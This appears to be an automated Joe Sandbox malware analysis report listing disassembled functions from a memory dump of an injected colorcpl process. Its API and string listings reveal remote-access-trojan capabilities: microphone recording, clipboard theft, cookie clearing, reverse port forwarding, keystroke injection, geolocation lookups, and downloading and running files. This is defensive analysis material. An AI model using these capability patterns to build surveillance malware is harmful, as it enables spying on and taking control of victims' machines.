                                        • Instruction Fuzzy Hash: DB01F771902209EBD710ABE6ED09E9BBBBCFBA9704F404159F62696140D7B86C06CB60
                                        Function 04AC9F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 898400f76dbf9d1db9364d6673546ba9139f966274ff9730082dcedb3800a066
                                        • Instruction ID: db6dbc391efb90501e4e78fc04380e50aa0f5f3f438ebb532eb9db5e876e171f
                                        • Opcode Fuzzy Hash: 898400f76dbf9d1db9364d6673546ba9139f966274ff9730082dcedb3800a066
                                        • Instruction Fuzzy Hash: 91C1D070F04259AFEB51CFA8D840BFDBBB4AF09314F04418DE855AB392D775A942CBA1
                                        Function 04AD2DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AD2A89: CreateFileW.KERNEL32(00000000,00000000,?,04AD2E64,?,?,00000000,?,04AD2E64,00000000,0000000C), ref: 04AD2AA6
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 04AD2ECF
                                        • __dosmaperr.LIBCMT ref: 04AD2ED6
                                        • GetFileType.KERNEL32(00000000), ref: 04AD2EE2
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 04AD2EEC
                                        • __dosmaperr.LIBCMT ref: 04AD2EF5
                                        • CloseHandle.KERNEL32(00000000), ref: 04AD2F15
                                        • CloseHandle.KERNEL32(00000000), ref: 04AD305F
                                        • GetLastError.KERNEL32 ref: 04AD3091
                                        • __dosmaperr.LIBCMT ref: 04AD3098
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID:
                                        • API String ID: 4237864984-0
                                        • Opcode ID: 26a2460cc9b43d7eab8bf8b9ae6b54849b42e09892acadc2b942f4d4d6fc415c
                                        • Instruction ID: d5af27eb2cc0f26e91aca3089fc3bf681f710d12d189baf5ae21b4fe7fae4194
                                        • Opcode Fuzzy Hash: 26a2460cc9b43d7eab8bf8b9ae6b54849b42e09892acadc2b942f4d4d6fc415c
                                        • Instruction Fuzzy Hash: C7A14332A101089FEF19DF68D851BAE7BB1EB0A324F14019DE812DF2D1DB35A813CB91
                                        Function 04AD0F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 04AD100F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD1092
                                        • __alloca_probe_16.LIBCMT ref: 04AD10CA
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,04AD123C,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD1125
                                        • __alloca_probe_16.LIBCMT ref: 04AD1174
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD113C
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,04AD123C,00000000,00000000,?,00000001,?,?,?,?), ref: 04AD11B8
                                        • __freea.LIBCMT ref: 04AD11E3
                                        • __freea.LIBCMT ref: 04AD11EF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 201697637-0
                                        • Opcode ID: 0016f9ecb716892f7a59af05d0b8de52b5852d33c4d8abe3acbf8c15b774456a
                                        • Instruction ID: f710c25fa1a4ed1acdf9d57c83fbb74a735894514f9dab6ff5c5599e6072e030
                                        • Opcode Fuzzy Hash: 0016f9ecb716892f7a59af05d0b8de52b5852d33c4d8abe3acbf8c15b774456a
                                        • Instruction Fuzzy Hash: 8F91C672E052169AEB249FA5C880EEEBBB59F0D714F14465DE807E7181E735E940CBA0
                                        Function 04AC268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AC5725: GetLastError.KERNEL32(?,00000000,04ABF143,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC5729
                                          • Part of subcall function 04AC5725: _free.LIBCMT ref: 04AC575C
                                          • Part of subcall function 04AC5725: SetLastError.KERNEL32(00000000,?,04A99994,-04AF3C14,?,?,?,?,04AE9654,04A8BDCB,.vbs), ref: 04AC579D
                                          • Part of subcall function 04AC5725: _abort.LIBCMT ref: 04AC57A3
                                        • _memcmp.LIBVCRUNTIME ref: 04AC2935
                                        • _free.LIBCMT ref: 04AC29A6
                                        • _free.LIBCMT ref: 04AC29BF
                                        • _free.LIBCMT ref: 04AC29F1
                                        • _free.LIBCMT ref: 04AC29FA
                                        • _free.LIBCMT ref: 04AC2A06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        • Opcode ID: 6613b7d3587331168c67124026b3a95ea3f4fc304c425d42ffa487e358d25b18
                                        • Instruction ID: 090ca35f380bf99f563f5557de13669263eec07180d538c4f32239b2dd07f46c
                                        • Opcode Fuzzy Hash: 6613b7d3587331168c67124026b3a95ea3f4fc304c425d42ffa487e358d25b18
                                        • Instruction Fuzzy Hash: 42B10776E012199BEB64DF18D988BA9B7B4FB08314F5085EED949A7250E731BE90CF40
                                        Function 06913450 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 137591632-1037565863
                                        • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                        • Instruction ID: 965b00bbe4440ffaf838c6ec05be5aff6940ffebfc88c69db9374f1a5f3ab72e
                                        • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                                        • Instruction Fuzzy Hash: 2BB13975E01219DFDBA4DF18C884AADB7B4FF48714F2045AAD949AB750E731AE90CF80
                                        Function 04A93360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        • Opcode ID: 143dbac11f318e4d87c619c26740bee2383606664c0c797fe753cca97a5e2629
                                        • Instruction ID: 7454eb6669bfda09bda3be08401e3531f4fd2a15029a0d09503516f427212d20
                                        • Opcode Fuzzy Hash: 143dbac11f318e4d87c619c26740bee2383606664c0c797fe753cca97a5e2629
                                        • Instruction Fuzzy Hash: A57178746083028FDF658F99C54562ABBF4EF8C745F04882EEC9687260EB74ED44CB92
                                        Function 04A8FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                        • API String ID: 3578746661-168337528
                                        • Opcode ID: d607aa378180d079a265465341ed9e3cfd670b54b87992e51c0c974e4c2fc499
                                        • Instruction ID: ba11a69768ea12b99c5939ea73ac21a6170067aba2ff37a97e1b20c31f185e4e
                                        • Opcode Fuzzy Hash: d607aa378180d079a265465341ed9e3cfd670b54b87992e51c0c974e4c2fc499
                                        • Instruction Fuzzy Hash: C651C331A08200AFFE04FB39D959A7E3AE9EB95248F50051DE4529B2D0EF24FD06C7C2
                                        Function 04A8971E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00001388), ref: 04A89738
                                          • Part of subcall function 04A8966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,04A89745), ref: 04A896A3
                                          • Part of subcall function 04A8966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,04A89745), ref: 04A896B2
                                          • Part of subcall function 04A8966D: Sleep.KERNEL32(00002710,?,?,?,04A89745), ref: 04A896DF
                                          • Part of subcall function 04A8966D: CloseHandle.KERNEL32(00000000,?,?,?,04A89745), ref: 04A896E6
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04A89774
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 04A89785
                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 04A8979C
                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 04A89816
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,04AE9654,?,00000000,00000000,00000000,00000000,00000000), ref: 04A8991F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                        • String ID: 05#v`#v
                                        • API String ID: 3795512280-3697325483
                                        • Opcode ID: d12f50e3437a4e0d70aca89b07d0b4ce0262fb6e2b784ad383d2c9cca0ae70b7
                                        • Instruction ID: 4fb70b533919c1cf0ff49b5d223f25a22a6a0f3919fe0d76815a8f1e411ab86d
                                        • Opcode Fuzzy Hash: d12f50e3437a4e0d70aca89b07d0b4ce0262fb6e2b784ad383d2c9cca0ae70b7
                                        • Instruction Fuzzy Hash: EA5164727042045BFB14FBB0DA64ABF7799EF90208F00096EE557971D1DF25BD0AC652
                                        Function 04A9601D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A9626A: __EH_prolog.LIBCMT ref: 04A9626F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,04AE3050), ref: 04A9611A
                                        • CloseHandle.KERNEL32(00000000), ref: 04A96123
                                        • DeleteFileA.KERNEL32(00000000), ref: 04A96132
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 04A960E6
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                        • String ID: <$@$Temp
                                        • API String ID: 1704390241-1032778388
                                        • Opcode ID: 8d54558b9affdf53781ee5d3fabc6abfb83ea4d752677eaf6c67b4f32bd764fd
                                        • Instruction ID: 2c73246e9537300274399fe59ad1e67cbef1994b7dd5e59f9fc12f98b9412ba0
                                        • Opcode Fuzzy Hash: 8d54558b9affdf53781ee5d3fabc6abfb83ea4d752677eaf6c67b4f32bd764fd
                                        • Instruction Fuzzy Hash: B5417B31900209ABEF14FBA4DE55BFEB779EF50308F504259E5066A0D1EF752E8ACB90
                                        Function 04A869F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,04AF1E78,04AE2F54,?,00000000,04A8708D,00000000), ref: 04A86A56
                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,04A8708D,00000000,?,?,0000000A,00000000), ref: 04A86A9E
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • CloseHandle.KERNEL32(00000000,?,00000000,04A8708D,00000000,?,?,0000000A,00000000), ref: 04A86ADE
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 04A86AFB
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 04A86B26
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 04A86B36
                                          • Part of subcall function 04A84B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,04A84C29,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84B85
                                          • Part of subcall function 04A84B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04A8546B), ref: 04A84BA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        • Opcode ID: 5ed6dfa30785dd14b866712182609371d16b8bc912e0dd50f1b7f876a2ffb022
                                        • Instruction ID: 49a1e5c0cfeda0d81f5ee466cd99e9e7b7d46e8e54ad800e1a23d68a2acb3b2d
                                        • Opcode Fuzzy Hash: 5ed6dfa30785dd14b866712182609371d16b8bc912e0dd50f1b7f876a2ffb022
                                        • Instruction Fuzzy Hash: 2C319A71904341AFE210FF60D944DAFB7A8FB94748F404A2EF58696150EF74BE498B92
                                        Function 04AC6FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,04ABE2F6,04ABE2F6,?,?,?,04AC7215,00000001,00000001,80E85006), ref: 04AC701E
                                        • __alloca_probe_16.LIBCMT ref: 04AC7056
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04AC7215,00000001,00000001,80E85006,?,?,?), ref: 04AC70A4
                                        • __alloca_probe_16.LIBCMT ref: 04AC713B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04AC719E
                                        • __freea.LIBCMT ref: 04AC71AB
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • __freea.LIBCMT ref: 04AC71B4
                                        • __freea.LIBCMT ref: 04AC71D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: f7b19961cd8cfb7f0e4d54bea9c12e853f4ec818279057bc0ba248cb6f95207d
                                        • Instruction ID: 4cf0c6e09e18ac3da4ca5d7bc0589966610362c99975dee986f1c643b5b8088d
                                        • Opcode Fuzzy Hash: f7b19961cd8cfb7f0e4d54bea9c12e853f4ec818279057bc0ba248cb6f95207d
                                        • Instruction Fuzzy Hash: 3A51E076601217AFEB668F64CC40EBB77A9EB44760F15462DFC09DA160EB74FC409BA0
                                        Function 04A97949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97982
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979A3
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979C3
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979D7
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04A979ED
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97A0A
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04A97A25
                                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 04A97A41
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 256d3e3cd8565ec6bad2012da1f37630189931c2cb4eb4bba2bbbd6c74142495
                                        • Instruction ID: 44701af45c7f777ea4f3354419a728efef77f032d6f89ec2f66c45b37ae7f934
                                        • Opcode Fuzzy Hash: 256d3e3cd8565ec6bad2012da1f37630189931c2cb4eb4bba2bbbd6c74142495
                                        • Instruction Fuzzy Hash: 4E318331554318AEE311CF51D941BEBBBDCEF89B54F00080EF6809A191D2A2A6898BA3
                                        Function 04A94F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 04A94F41
                                        • EmptyClipboard.USER32 ref: 04A94F4F
                                        • CloseClipboard.USER32 ref: 04A94F55
                                        • OpenClipboard.USER32 ref: 04A94F5C
                                        • GetClipboardData.USER32(0000000D), ref: 04A94F6C
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94F75
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F7E
                                        • CloseClipboard.USER32 ref: 04A94F84
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID:
                                        • API String ID: 2172192267-0
                                        • Opcode ID: f661c17e56c73b7252efb2719de427c9264c4ab485d0cbe2461d4d8ac07cc1ed
                                        • Instruction ID: b2c3d93b2595a8a3a432ec586bdd7e8494403d4a607ba6eb6be676134247f4f2
                                        • Opcode Fuzzy Hash: f661c17e56c73b7252efb2719de427c9264c4ab485d0cbe2461d4d8ac07cc1ed
                                        • Instruction Fuzzy Hash: 8E0192366092009BE714BB70DD596AE77F8FFA4206F44095EF54B82191EF38AC0BCA51
                                        Function 04ACDC05 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 71ebd1c57f70807ba58252d518f310a74526bad8fd4d91ee34a53df22e0b3249
                                        • Instruction ID: a76b293eaf20181ce6108ead7d3aea88f884bf1ffcb28e1a64acd86a6ea9914d
                                        • Opcode Fuzzy Hash: 71ebd1c57f70807ba58252d518f310a74526bad8fd4d91ee34a53df22e0b3249
                                        • Instruction Fuzzy Hash: 5061E271D05209AFEB61CF68C940BAEBBF5EF05724F10807EE955EB240EB70B9418B50
                                        Function 04A81CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strftime.LIBCMT ref: 04A81D30
                                          • Part of subcall function 04A81A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04A81AB9
                                        • waveInUnprepareHeader.WINMM(04AEFA78,00000020,00000000,?), ref: 04A81DE2
                                        • waveInPrepareHeader.WINMM(04AEFA78,00000020), ref: 04A81E20
                                        • waveInAddBuffer.WINMM(04AEFA78,00000020), ref: 04A81E2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 3809562944-3597965672
                                        • Opcode ID: aa28d57da419050db2097c30b27822002834f7d5e6121518413b8acbd5e4c756
                                        • Instruction ID: 05c2f4ee7fc3eaee39f22f61ebf98322b6cfe59b08f8b64ea57b8bdebff7b777
                                        • Opcode Fuzzy Hash: aa28d57da419050db2097c30b27822002834f7d5e6121518413b8acbd5e4c756
                                        • Instruction Fuzzy Hash: C8318F71104240AFE314FB61D954EAA77E8FBA4208F80452DF1568B1D0EF74BE0BDB52
                                        Function 04A8AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A91F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                          • Part of subcall function 04A91F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                          • Part of subcall function 04A91F91: RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 04A8AEAC
                                        • PathFileExistsA.SHLWAPI(?), ref: 04A8AEB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                        • API String ID: 1133728706-4073444585
                                        • Opcode ID: 1b9eb0f214cab7a27aca9f9746a7f994b116ed45b9d827df8e1f5c6a153fc560
                                        • Instruction ID: 716ba7d6c576cadd0700442f9b6583d28c4c7155343f9b8c3cf0abcf3a494d71
                                        • Opcode Fuzzy Hash: 1b9eb0f214cab7a27aca9f9746a7f994b116ed45b9d827df8e1f5c6a153fc560
                                        • Instruction Fuzzy Hash: 97217E71A401186BFF04FBE1DE959FE7778EF65208F84055EA902671C0EE61BD0ACB91
                                        Function 04AD3D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83282f35ec2dc640d665dc43c5555178d12fb0fb00371cd4756b38a34ef8eda4
                                        • Instruction ID: f4f3e3a00c005b19b5a00bce8c5d5cd17d44a485a28ed3274f92c10a599a5f13
                                        • Opcode Fuzzy Hash: 83282f35ec2dc640d665dc43c5555178d12fb0fb00371cd4756b38a34ef8eda4
                                        • Instruction Fuzzy Hash: 74112972A05214BBEF112F769C04E6B7F6CEF85734B104A19FC97D7150EA35E8018BA1
                                        Function 04A9936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04A99392
                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 04A993A8
                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 04A993C1
                                        • InternetCloseHandle.WININET(00000000), ref: 04A99407
                                        • InternetCloseHandle.WININET(00000000), ref: 04A9940A
                                        Strings
                                        • http://geoplugin.net/json.gp, xrefs: 04A993A2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpen$FileRead
                                        • String ID: http://geoplugin.net/json.gp
                                        • API String ID: 3121278467-91888290
                                        • Opcode ID: afc8d9533a1bb3409f1356694829d70590e737fb50fd37ac202de6d1baf200e9
                                        • Instruction ID: 5193443fc6a788910fb78684a98e71f75b0b28eb9cb171669857751f1761b636
                                        • Opcode Fuzzy Hash: afc8d9533a1bb3409f1356694829d70590e737fb50fd37ac202de6d1baf200e9
                                        • Instruction Fuzzy Hash: F61182711063227BE724EF269D48EFB7BECEF85664F00043DF94692281DB64AC06C6A1
                                        Function 04ACE0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04ACDE21: _free.LIBCMT ref: 04ACDE4A
                                        • _free.LIBCMT ref: 04ACE128
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04ACE133
                                        • _free.LIBCMT ref: 04ACE13E
                                        • _free.LIBCMT ref: 04ACE192
                                        • _free.LIBCMT ref: 04ACE19D
                                        • _free.LIBCMT ref: 04ACE1A8
                                        • _free.LIBCMT ref: 04ACE1B3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
